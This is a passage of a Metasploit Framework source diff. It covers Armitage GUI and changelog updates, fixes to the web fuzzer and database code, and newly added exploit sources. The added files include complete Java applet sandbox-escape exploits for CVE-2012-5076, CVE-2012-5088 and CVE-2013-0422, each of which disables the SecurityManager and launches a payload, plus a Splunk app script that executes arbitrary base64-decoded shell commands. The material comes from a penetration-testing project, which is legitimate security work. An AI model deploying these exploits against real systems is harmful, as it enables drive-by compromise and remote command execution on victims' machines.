+				/* delete our saved label data */
+				executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'");
+
+				/* serialize our notes data */
+				ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128);
+				ObjectOutputStream handle = new ObjectOutputStream(store);
+				handle.writeObject(labels);
+				handle.close();
+				store.close();
+
+				String data = Base64.encode(store.toByteArray());
+
+				/* save our label data */
+				PreparedStatement stmt = null;
+				stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)");
+				stmt.setString(1, data);
+				stmt.executeUpdate();
+
+				return new HashMap();
+			}
 			else if (methodName.equals("db.report_host")) {
 				Map values = (Map)params[0];
 				String host = values.get("host") + "";

external/source/armitage/src/msf/RpcCacheImpl.java

@@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable {
 		key.append(temp.get("ports"));
 		key.append(";");
 		key.append(temp.get("session"));
+		key.append(";");
+		key.append(temp.get("labels"));
 		return key.toString();
 	}
 

external/source/armitage/src/table/NetworkTable.java

@@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener {
 	public NetworkTable(Properties display) {
 		this.display = display;
 
-		model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256);
+		model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256);
 		table = new ATable(model);
 		TableRowSorter sorter = new TableRowSorter(model);
 		sorter.toggleSortOrder(1);
@@ -79,12 +79,13 @@ public class NetworkTable extends JComponent implements ActionListener {
 		};
 
 		sorter.setComparator(1, hostCompare);
-		sorter.setComparator(3, hostCompare);
+		sorter.setComparator(4, hostCompare);
 
 		table.setRowSorter(sorter);
 		table.setColumnSelectionAllowed(false);
 
 		table.getColumn("Address").setPreferredWidth(125);
+		table.getColumn("Label").setPreferredWidth(125);
 		table.getColumn("Pivot").setPreferredWidth(125);
 		table.getColumn(" ").setPreferredWidth(32);
 		table.getColumn(" ").setMaxWidth(32);
@@ -95,7 +96,7 @@ public class NetworkTable extends JComponent implements ActionListener {
 			public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
 				JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col);
 
-				if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
+				if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
 					component.setFont(component.getFont().deriveFont(Font.BOLD));
 				}
 				else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) {
@@ -252,16 +253,17 @@ public class NetworkTable extends JComponent implements ActionListener {
         public void addActionForKeySetting(String key, String dvalue, Action action) {
 	}
 
-	public Object addNode(String id, String label, Image image, String tooltip) {
+	public Object addNode(String id, String label, String description, Image image, String tooltip) {
 		if (id == null || label == null)
 			return null;
 
 		HashMap map = new HashMap();
 		map.put("Address", id);
 
-		if (label.indexOf(id) > -1)
-			label = label.substring(id.length());
-		map.put("Description", label);
+		if (description.indexOf(id) > -1)
+			description = description.substring(id.length());
+		map.put("Label", label);
+		map.put("Description", description);
 		map.put("Tooltip", tooltip);
 		map.put("Image", image);
 		map.put(" ", tooltip);

external/source/armitage/src/ui/ATable.java

@@ -25,6 +25,13 @@ public class ATable extends JTable {
 		specialitems.add("SigningCert");
 		specialitems.add("WORDLIST");
 		specialitems.add("SESSION");
+		specialitems.add("REXE");
+		specialitems.add("EXE::Custom");
+		specialitems.add("EXE::Template");
+		specialitems.add("USERNAME");
+		specialitems.add("PASSWORD");
+		specialitems.add("SMBUser");
+		specialitems.add("SMBPass");
 
 		return new TableCellRenderer() {
 			public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column)  {

external/source/armitage/src/ui/ZoomableImage.java

@@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel {
 				check(ev);
 			}
 		});
+
+		setHorizontalAlignment(SwingConstants.CENTER);
 	}
 
 	protected void updateIcon() {

external/source/armitage/whatsnew.txt

@@ -1,6 +1,50 @@
 Armitage Changelog
 ==================
 
+23 Jan 13 (tested against msf 16351)
+---------
+- Added helpers to set EXE::Custom and EXE::Template options.
+- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
+- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
+  check if a proxy server is up was deadlock prone. Removed it.
+- Starting SOCKS Proxy module now opens a tab displaying the module
+  start process. An event is posted to the event log too.
+- Created an option helper to select credentials for SMBUser, SMBPass, 
+  USERNAME, and PASSWORD. 
+- Added a feature to label hosts. A label will show up in its own column
+  in table view or below all info in graph view. Any team member may
+  change a label through [host] -> host -> Set Label. You may also use
+  dynamic workspaces to show hosts with certain labels attached.
+- Fixed bad things happening when connecting Armitage to 'localhost' and
+  not '127.0.0.1'.
+- Screenshots and Webcam shots are now centered in their tab.
+- Added an alternate .bat file to start msfrpcd on Windows in the
+  Metasploit 4.5 installer's environment.
+- Added a color-style for [!] warning messages
+
+Cortana Updates (for scripters)
+--------
+- &handler function now works as advertised.
+- Cortana now avoids use of core.setg
+
+4 Jan 13 (tested against msf 16252)
+--------
+- Added a helper to set REXE option
+- Added an icon to represent Windows 8
+- [host] -> Login menu is now built using open services for all 
+  highlighted hosts, not just the first one.
+- [host] -> Login items now escape punctuation characters in passwords
+  before passing them to a framework module.
+- Added the windows and linux postgres_payload exploits to the use a
+  reverse payload by default list.
+- Small tweak to allow Armitage to work with Metasploit 4.5 installed
+  environment on Windows.
+
+Cortana Updates (for scripters)
+--------
+- &credential_add and &credential_delete no longer break when a 
+  password has creative punctuation in it.
+
 26 Nov 12 (tested against msf 16114)
 ---------
 - Windows command shell tab is now friendlier to commands that prompt

external/source/byakugan/COPYING

@@ -0,0 +1,24 @@
+Copyright (c) Lurene Grenier, 2009
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+    * Redistributions of source code must retain the above copyright
+      notice, this list of conditions and the following disclaimer.
+    * Redistributions in binary form must reproduce the above copyright
+      notice, this list of conditions and the following disclaimer in the
+      documentation and/or other materials provided with the distribution.
+    * Neither the name of Lurene Grenier nor the
+      names of its contributors may be used to endorse or promote products
+      derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY LURENE GRENIER ''AS IS'' AND ANY
+EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL LURENE GRENIER BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

external/source/exploits/cve-2012-5076_2/B.java

@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}

external/source/exploits/cve-2012-5076_2/Exploit.java

@@ -0,0 +1,78 @@
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+//import java.lang.Runtime;
+import java.applet.Applet;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.Method;
+import com.sun.org.glassfish.external.statistics.impl.*;
+
+public class Exploit extends Applet
+{
+	public static MethodHandles.Lookup test0;
+	
+    public Exploit()
+    {
+    }
+    
+
+    public void init()
+    {
+        try
+        {
+			
+            ByteArrayOutputStream bos = new ByteArrayOutputStream();
+            byte[] buffer = new byte[8192];
+            int length;
+
+            // read in the class file from the jar
+            InputStream is = getClass().getResourceAsStream("B.class");
+            // and write it out to the byte array stream
+            while( ( length = is.read( buffer ) ) > 0 )
+                bos.write( buffer, 0, length );
+            // convert it to a simple byte array
+            buffer = bos.toByteArray();
+            
+            Class c = Class.forName("java.lang.invoke.MethodHandles");
+            Method m = c.getMethod("lookup", new Class[0]);
+            AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
+            MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
+
+            MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
+            MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
+            Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
+            Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
+            
+            // Instance of sun.org.mozilla.javascript.internal.Context
+            MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
+            MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
+            Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
+            
+            // Context.createClassLoader
+            MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
+            MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
+            Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
+            
+            // GeneratedClassLoader.defineClass
+            MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+            MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
+            Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
+            
+            //New instance of the helper Class
+            localClass3.newInstance();
+
+            Payload.main(null);
+            //Runtime.getRuntime().exec("calc.exe");
+        }
+        catch(Throwable ex)
+        {
+            //ex.printStackTrace();
+        }
+    }
+
+}

external/source/exploits/cve-2012-5076_2/Makefile

@@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	B.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/
+	mv B.class ../../../../data/exploits/cve-2012-5076_2/
+
+clean:
+	rm -rf *.class

external/source/exploits/cve-2012-5088/B.java

@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}

external/source/exploits/cve-2012-5088/Exploit.java

@@ -0,0 +1,66 @@
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+//import java.lang.Runtime;
+import java.applet.Applet;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.Method;
+
+public class Exploit extends Applet
+{
+	
+    public Exploit()
+    {
+    }
+
+    public void init()
+    {
+        try
+        {
+			
+            ByteArrayOutputStream bos = new ByteArrayOutputStream();
+            byte[] buffer = new byte[8192];
+            int length;
+
+            // read in the class file from the jar
+            InputStream is = getClass().getResourceAsStream("B.class");
+            // and write it out to the byte array stream
+            while( ( length = is.read( buffer ) ) > 0 )
+                bos.write( buffer, 0, length );
+            // convert it to a simple byte array
+            buffer = bos.toByteArray();
+			
+            MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
+            MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
+            MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0);
+            Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
+            Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
+            MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
+            MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
+            MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
+            MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
+            Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
+            MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
+            MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
+            MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
+            MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
+            Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
+            MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+            MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
+            Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
+            localClass3.newInstance();
+            Payload.main(null);
+            //Runtime.getRuntime().exec("calc.exe");
+        }
+        catch(Throwable ex)
+        {
+            //ex.printStackTrace();
+        }
+    }
+
+}

external/source/exploits/cve-2012-5088/Makefile

@@ -0,0 +1,16 @@
+CLASSES = \
+	Exploit.java  \
+	B.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/cve-2012-5088/
+	mv B.class ../../../../data/exploits/cve-2012-5088/
+
+clean:
+	rm -rf *.class

external/source/exploits/cve-2013-0422/B.java

@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}

external/source/exploits/cve-2013-0422/Exploit.java

@@ -0,0 +1,73 @@
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+import java.lang.Runtime;
+import java.applet.Applet;
+import com.sun.jmx.mbeanserver.JmxMBeanServer;
+import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
+import com.sun.jmx.mbeanserver.MBeanInstantiator;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.Method;
+
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+    
+
+    public void init()
+    {
+        try
+        {
+            ByteArrayOutputStream bos = new ByteArrayOutputStream();
+            byte[] buffer = new byte[8192];
+            int length;
+
+            // read in the class file from the jar
+            InputStream is = getClass().getResourceAsStream("B.class");
+            // and write it out to the byte array stream
+            while( ( length = is.read( buffer ) ) > 0 )
+                bos.write( buffer, 0, length );
+            // convert it to a simple byte array
+            buffer = bos.toByteArray();
+
+            JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
+            JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
+            MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
+            ClassLoader a = null;
+            Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
+            Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
+            MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
+            MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
+            MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
+            MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
+            MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
+            Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
+            MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
+            MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
+            MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
+            MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
+            Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
+            MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+            MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
+            Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
+            localClass3.newInstance();
+
+            Payload.main(null);
+            //Runtime.getRuntime().exec("calc.exe");
+        }
+        catch(Throwable ex)
+        {
+            //exception.printStackTrace();
+        }
+    }
+
+}

external/source/exploits/cve-2013-0422/Makefile

@@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	B.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/cve-2013-0422/
+	mv B.class ../../../../data/exploits/cve-2013-0422/
+
+clean:
+	rm -rf *.class

external/source/exploits/splunk/upload_app_exec/bin/msf_exec.py

@@ -0,0 +1,15 @@
+import sys
+import base64
+import splunk.Intersplunk
+
+results = []
+
+try:
+        sys.modules['os'].system(base64.b64decode(sys.argv[1]))
+
+except:
+        import traceback
+        stack = traceback.format_exc()
+        results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
+
+splunk.Intersplunk.outputResults(results)

external/source/exploits/splunk/upload_app_exec/default/app.conf

@@ -0,0 +1,7 @@
+[launcher]
+author=Marc Wickenden
+description=Metasploit module spunk_upload_app_exec.rb
+version=1.3.3.7
+
+[ui]
+is_visible = true

external/source/exploits/splunk/upload_app_exec/default/commands.conf

@@ -0,0 +1,7 @@
+[msf_exec]
+type = python
+filename = msf_exec.py
+local = false
+enableheader = false
+streaming = false
+perf_warn_limit = 0

external/source/exploits/splunk/upload_app_exec/metadata/default.meta

@@ -0,0 +1,2 @@
+[commands]
+export = system

lib/msf/base/simple/exploit.rb

@@ -69,8 +69,7 @@ module Exploit
 
 			# Make sure parameters are valid.
 			if (opts['Payload'] == nil)
-				raise MissingPayloadError,
-					"You must specify a payload.", caller
+				raise MissingPayloadError.new, caller
 			end
 
 			# Verify the options
@@ -81,7 +80,7 @@ module Exploit
 
 			# Initialize the driver instance
 			driver.exploit    = exploit
-			driver.payload    = exploit.framework.modules.create(opts['Payload'])
+			driver.payload    = exploit.framework.payloads.create(opts['Payload'])
 			
 			# Set the force wait for session flag if the caller requested force
 			# blocking.  This is so that passive exploits can be blocked on from

lib/msf/core/auxiliary/crawler.rb

@@ -216,7 +216,13 @@ module Auxiliary::HttpCrawler
 			# Bubble this up to the top-level handler
 			raise $!
 		rescue ::Exception => e
-			print_error("Crawler Exception: #{url} #{e} #{e.backtrace}")
+			# Ridiculous f'ing anonymous timeout exception which I've no idea
+			# how it comes into existence.
+			if e.to_s =~ /execution expired/
+				raise ::Timeout::Error
+			else
+				print_error("Crawler Exception: #{url} #{e} #{e.backtrace}")
+			end
 		ensure
 			@crawler.shutdown rescue nil
 			@crawler = nil

lib/msf/core/auxiliary/nmap.rb

@@ -224,7 +224,7 @@ def nmap_validate_arg(str)
 	disallowed_characters = /([\x00-\x19\x21\x23-\x26\x28\x29\x3b\x3e\x60\x7b\x7c\x7d\x7e-\xff])/n
 	badchar = str[disallowed_characters]
 	if badchar
-		print_error "Malformed nmap arguments (contains '#{c}'): #{str}"
+		print_error "Malformed nmap arguments (contains '#{badchar}'): #{str}"
 		return false
 	end
 	# Check for commas outside of quoted arguments

lib/msf/core/auxiliary/web.rb

@@ -133,7 +133,7 @@ module Auxiliary::Web
 	# Override it if you need more complex processing, but remember to return
 	# the proof as a String.
 	#
-	# response - Net::HTTPResponse
+	# response - Auxiliary::Web::HTTP::Response
 	# element - the submitted element
 	#
 	def find_proof( response, element )
@@ -250,7 +250,9 @@ module Auxiliary::Web
 
 		if !(payload = opts[:payload])
 			if payloads
-				payload = payloads.select{ |p| element.altered_value.include?( p ) }.first
+				payload = payloads.select { |p|
+					element.altered_value.include?( p )
+				}.sort_by { |p| p.size }.last
 			end
 		end
 

lib/msf/core/auxiliary/web/analysis/differential.rb

@@ -101,7 +101,7 @@ module Analysis::Differential
 				# save the response and some data for analysis
 				responses[:good][elem.altered] << {
 					'res'  => res,
-					'elem' => elem
+					'elem' => elem.dup
 				}
 			end
 		end
@@ -122,8 +122,7 @@ module Analysis::Differential
 						http.if_not_custom_404( action, res['res'].body ) do
 							# if this isn't a custom 404 page then it means that
 							# the element is vulnerable, so go ahead and log the issue
-							fuzzer.process_vulnerability( res['elem'], 'Manipulatable responses.',
-														:payload => res['elem'].altered_value )
+							fuzzer.process_vulnerability( res['elem'], 'Boolean manipulation.' )
 						end
 					end
 				end

lib/msf/core/auxiliary/web/analysis/taint.rb

@@ -20,10 +20,14 @@ module Analysis::Taint
 	# opts - Options Hash (default: {})
 	#
 	def taint_analysis( opts = {} )
-	return if fuzzed? :type => :taint
-	fuzzed :type => :taint
+		return if fuzzed? :type => :taint
+		fuzzed :type => :taint
 
-	fuzz_async do |response, permutation|
+		# if we get a result without injecting anything then bail out to avoid
+		# an FP
+		return if fuzzer.find_proof( submit, self )
+
+		fuzz_async do |response, permutation|
 			next if !response || !(proof = fuzzer.find_proof( response, permutation ))
 			fuzzer.process_vulnerability( permutation, proof )
 		end

lib/msf/core/auxiliary/web/analysis/timing.rb

@@ -54,7 +54,8 @@ module Analysis::Timing
 			timeout = opts[:delay]
 
 			seed    = p.altered_value.dup
-			payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.first
+			payload = fuzzer.payloads.select{ |pl| seed.include?( pl ) }.
+				sort_by { |p2| p2.size }.last
 
 			# 1st pass, make sure the webapp is responsive
 			if_responsive do

lib/msf/core/auxiliary/web/fuzzable.rb

@@ -43,18 +43,15 @@ class Fuzzable
 	end
 
 	def submit( opts = {} )
-		fuzzer.increment_request_counter
+		fuzzer.increment_request_counter if fuzzer
 
-		resp = http.request_async( *request( opts ) )
-		handle_response( resp )
-		resp
+		http.request( *request( opts ) )
 	end
 
 	def submit_async( opts = {}, &callback )
 		fuzzer.increment_request_counter
 
 		http.request_async( *request( opts ) ) do |resp|
-			handle_response( resp )
 			callback.call resp if callback
 		end
 
@@ -89,20 +86,6 @@ class Fuzzable
 		end
 	end
 
-	def handle_response( resp )
-		str = "    #{fuzzer.shortname}: #{resp.code} - #{method.to_s.upcase}" +
-			" #{action} #{params}"
-
-		case resp.code.to_i
-			when 200,404,301,302,303
-				#fuzzer.print_status str
-			when 500,503,401,403
-				fuzzer.print_good str
-			else
-				fuzzer.print_error str
-		end
-	end
-
 end
 
 end

lib/msf/core/auxiliary/web/http.rb

@@ -120,10 +120,15 @@ class Auxiliary::Web::HTTP
 
 		tl = []
 		loop do
-			# Spawn threads for each host
 			while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop)
 				tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request|
-					request.handle_response request( request.url, request.opts )
+					# Keep callback failures isolated.
+					begin
+						request.handle_response request( request.url, request.opts )
+					rescue => e
+						elog e.to_s
+						e.backtrace.each { |l| elog l }
+					end
 				end
 			end
 
@@ -291,7 +296,12 @@ class Auxiliary::Web::HTTP
 		Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout )
 	rescue ::Timeout::Error
 		Response.timed_out
-	rescue ::Errno::EPIPE, Rex::ConnectionTimeout
+	#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
+	# This is bad but we can't anticipate the gazilion different types of network
+	# i/o errors between Rex and Errno.
+	rescue => e
+		elog e.to_s
+		e.backtrace.each { |l| elog l }
 		Response.empty
 	end
 

lib/msf/core/db.rb

@@ -676,6 +676,13 @@ class DBManager
 			sess_data[:desc] = sess_data[:desc][0,255]
 		end
 
+		# In the case of multi handler we cannot yet determine the true
+		# exploit responsible. But we can at least show the parent versus
+		# just the generic handler:
+		if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
+			sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
+		end
+
 		s = ::Mdm::Session.new(sess_data)
 		s.save!
 
@@ -684,19 +691,26 @@ class DBManager
 		end
 
 		# If this is a live session, we know the host is vulnerable to something.
-		# If the exploit used was multi/handler, though, we don't know what
-		# it's vulnerable to, so it isn't really useful to save it.
-		if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler"
+		if opts[:session] and session.via_exploit
 			return unless host
 
 			mod = framework.modules.create(session.via_exploit)
+
+			if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
+				mod_fullname = sess_data[:datastore]['ParentModule']
+				mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
+			else 
+				mod_name = mod.name
+				mod_fullname = mod.fullname
+			end
+
 			vuln_info = {
 				:host => host.address,
-				:name => mod.name,
+				:name => mod_name,
 				:refs => mod.references,
 				:workspace => wspace,
 				:exploited_at => Time.now.utc,
-				:info => "Exploited by #{mod.fullname} to create Session #{s.id}"
+				:info => "Exploited by #{mod_fullname} to create Session #{s.id}"
 			}
 
 			port    = session.exploit_datastore["RPORT"]
@@ -706,10 +720,15 @@ class DBManager
 
 			vuln = framework.db.report_vuln(vuln_info)
 			
+			if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
+				via_exploit = sess_data[:datastore]['ParentModule']
+			else
+				via_exploit = session.via_exploit
+			end
 			attempt_info = {
 				:timestamp   => Time.now.utc,
 				:workspace   => wspace,
-				:module      => session.via_exploit,
+				:module      => via_exploit,
 				:username    => session.username,
 				:refs        => mod.references,
 				:session_id  => s.id,
@@ -2353,7 +2372,8 @@ class DBManager
 	# +:ssl+::   whether or not SSL is in use on this port
 	#
 	#
-	# Duplicate records for a given web_site, path, method, pname, and name combination will be overwritten
+	# Duplicate records for a given web_site, path, method, pname, and name
+	# combination will be overwritten
 	#
 
 	def report_web_vuln(opts)
@@ -4543,6 +4563,9 @@ class DBManager
 			end
 
 			info = {
+				# XXX: There is a :request attr in the model, but report_web_vuln
+				# doesn't seem to know about it, so this gets ignored.
+				#:request  => vuln['request'],
 				:path     => uri.path,
 				:query    => uri.query,
 				:method   => method,
@@ -4846,6 +4869,7 @@ class DBManager
 	# If you have Nokogiri installed, you'll be shunted over to
 	# that. Otherwise, you'll hit the old NmapXMLStreamParser.
 	def import_nmap_xml(args={}, &block)
+		return nil if args[:data].nil? or args[:data].empty?
 		wspace = args[:wspace] || workspace
 		bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
 

lib/msf/core/db_manager.rb

@@ -268,6 +268,8 @@ class DBManager
 	def disconnect
 		begin
 			ActiveRecord::Base.remove_connection
+			self.migrated = false
+			self.modules_cached = false
 		rescue ::Exception => e
 			self.error = e
 			elog("DB.disconnect threw an exception: #{e}")
@@ -375,7 +377,6 @@ class DBManager
 		refresh.each  {|md| md.destroy }
 		refresh = nil
 
-		stime = Time.now.to_f
 		[
 			[ 'exploit',   framework.exploits  ],
 			[ 'auxiliary', framework.auxiliary ],

lib/msf/core/encoded_payload.rb

@@ -41,6 +41,7 @@ class EncodedPayload
 	# This method generates the full encoded payload and returns the encoded
 	# payload buffer.
 	#
+	# @return [String] The encoded payload.
 	def generate(raw = nil)
 		self.raw           = raw
 		self.encoded       = nil
@@ -86,8 +87,9 @@ class EncodedPayload
 
 	#
 	# Generates the raw payload from the payload instance.  This populates the
-	# raw attribute.
+	# {#raw} attribute.
 	#
+	# @return [String] The raw, unencoded payload.
 	def generate_raw
 		self.raw = (reqs['Prepend'] || '') + pinst.generate + (reqs['Append'] || '')
 
@@ -216,7 +218,7 @@ class EncodedPayload
 			# If the encoded payload is nil, raise an exception saying that we
 			# suck at life.
 			if (self.encoded == nil)
-				encoder = nil
+				self.encoder = nil
